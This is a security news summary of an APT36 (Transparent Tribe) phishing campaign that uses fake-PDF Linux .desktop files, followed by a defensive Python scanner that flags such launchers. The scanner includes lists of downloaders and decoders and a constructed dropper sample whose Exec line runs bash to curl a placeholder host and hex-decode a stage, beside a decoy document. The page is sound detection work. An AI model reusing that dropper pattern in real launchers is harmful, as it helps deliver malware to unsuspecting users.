Cyber-security researchers at CYFIRMA and CloudSEK have warned that the Pakistan-linked hacking group APT36, also known as Transparent Tribe, is running a new espionage campaign against Indian government and defence organisations. The attackers are sending spear-phishing e-mails that contain a zip archive titled “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”. Inside the archive is a Linux .desktop file that poses as a PDF but executes Bash commands to download and run a hex-encoded payload from securestore.cv while simultaneously displaying a harmless document in Firefox to avoid suspicion. The downloaded Go-based payload connects to a hard-coded command-and-control server, modgovindia.space:4000, where it receives further instructions, exfiltrates data and establishes persistence through cron jobs. Analysis shows the malware can carry out system reconnaissance, harvest credentials and deploy the Poseidon backdoor for long-term access and potential lateral movement. APT36 has a decade-long record of targeting Indian military and diplomatic assets and has recently expanded into education and civil-society sectors. The latest use of weaponised .desktop files reflects what researchers call a tactical shift aimed at exploiting BOSS, India’s Linux distribution, alongside the group’s traditional Windows-based tools. The campaign, first detected on 1 August and still active, underscores persistent risks to Indian critical infrastructure from state-aligned threat actors.
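The abuse described above relies on a plain-text `.desktop` launcher whose `Name` and `Icon` imitate a PDF while its `Exec` line runs a shell. Because the format is trivial to parse, a defender can triage launchers in user directories with a few heuristics. The scanner below is an added example written for this page, not code from CYFIRMA, CloudSEK or The Hacker News; the two entries it checks are constructed samples, `example.invalid` is a placeholder rather than an indicator from the report, and the dropper sample is deliberately abbreviated (it downloads and decodes but never executes anything). It generalises slightly beyond the reported case by treating any document-like extension and any common downloader or decoder as a signal, not only the `.pdf`, hex and Bash combination the researchers saw.

```python
"""
Heuristic triage of Linux .desktop launchers that masquerade as documents.

Added example for this page; not the researchers' or the campaign's code.
Sample entries are constructed; 'example.invalid' is a placeholder domain.
"""
import configparser
import re
from dataclasses import dataclass, field

# Tokens a document launcher has no legitimate reason to invoke.
SHELL_INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
DOWNLOADERS = {"curl", "wget"}
DECODERS = {"xxd", "base64"}          # decoding stages of a dropper chain
DECOY_VIEWERS = {"firefox", "xdg-open", "evince", "okular"}
DOC_EXTENSIONS = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt)\b", re.IGNORECASE)
SHELL_CHAIN = re.compile(r"(&&|\|\||;|\|)")   # command chaining / piping
WORD = re.compile(r"[A-Za-z0-9_./:-]+")        # crude tokeniser for Exec=


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def parse_desktop(text: str) -> dict:
    """Return the keys of the [Desktop Entry] group as a dict (case preserved)."""
    cp = configparser.RawConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # keys are case-sensitive in the spec
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("missing [Desktop Entry] group")
    return dict(cp.items("Desktop Entry"))


def analyse(entry: dict) -> Verdict:
    """Flag launchers that look like documents but behave like droppers."""
    v = Verdict(False)
    name = entry.get("Name", "")
    exec_line = entry.get("Exec", "")
    # Tokenise the whole Exec string (including text inside quotes) so that
    # commands hidden behind `bash -c "..."` are still seen.
    base_names = {t.rsplit("/", 1)[-1] for t in WORD.findall(exec_line)}
    has_shell = bool(base_names & SHELL_INTERPRETERS)

    if DOC_EXTENSIONS.search(name) and has_shell:
        v.reasons.append("document-looking Name with shell interpreter in Exec")
    if base_names & DOWNLOADERS:
        v.reasons.append("network download tool in Exec")
    if base_names & DECODERS:
        v.reasons.append("payload decoder in Exec")
    if (entry.get("Terminal", "false").lower() == "false"
            and SHELL_CHAIN.search(exec_line) and has_shell):
        v.reasons.append("chained shell commands with Terminal=false")
    if base_names & DECOY_VIEWERS and has_shell:
        v.reasons.append("decoy viewer launched alongside a shell")

    v.suspicious = bool(v.reasons)
    return v


# Constructed benign launcher: opens a local document, nothing else.
SAMPLE_BENIGN = """[Desktop Entry]
Type=Application
Name=Quarterly Report.pdf
Icon=application-pdf
Terminal=false
Exec=xdg-open /home/user/Documents/report.pdf
"""

# Constructed, abbreviated dropper-style launcher (placeholder domain; the
# downloaded file is never executed here). Mirrors the shape the report
# describes: shell, download, decode, decoy document in a browser.
SAMPLE_DROPPER = """[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl https://example.invalid/stage | xxd -r -p > /tmp/stage && firefox /tmp/decoy.pdf"
"""


def scan(text: str) -> Verdict:
    return analyse(parse_desktop(text))


if __name__ == "__main__":
    for label, sample in (("benign", SAMPLE_BENIGN), ("dropper", SAMPLE_DROPPER)):
        verdict = scan(sample)
        print(f"{label}: suspicious={verdict.suspicious}")
        for reason in verdict.reasons:
            print(f"  - {reason}")
```

In practice `scan()` would be fed every `*.desktop` under `~/Desktop`, `~/.local/share/applications` and `~/.config/autostart`; since the report also notes persistence through cron, a hunt should pair this with a review of user crontabs for entries pointing at files in temporary or hidden directories.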
Android.Backdoor.916.origin malware targets Russian business executives https://t.co/j01Dz0KN8w
Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing: https://t.co/SsAG8UIF9e by The Hacker News #infosec #cybersecurity #technology #news
This Android malware poses as an antivirus developed by Russian intelligence ➡️ https://t.co/dW9U5KkwFG https://t.co/1sPrZ3UwPj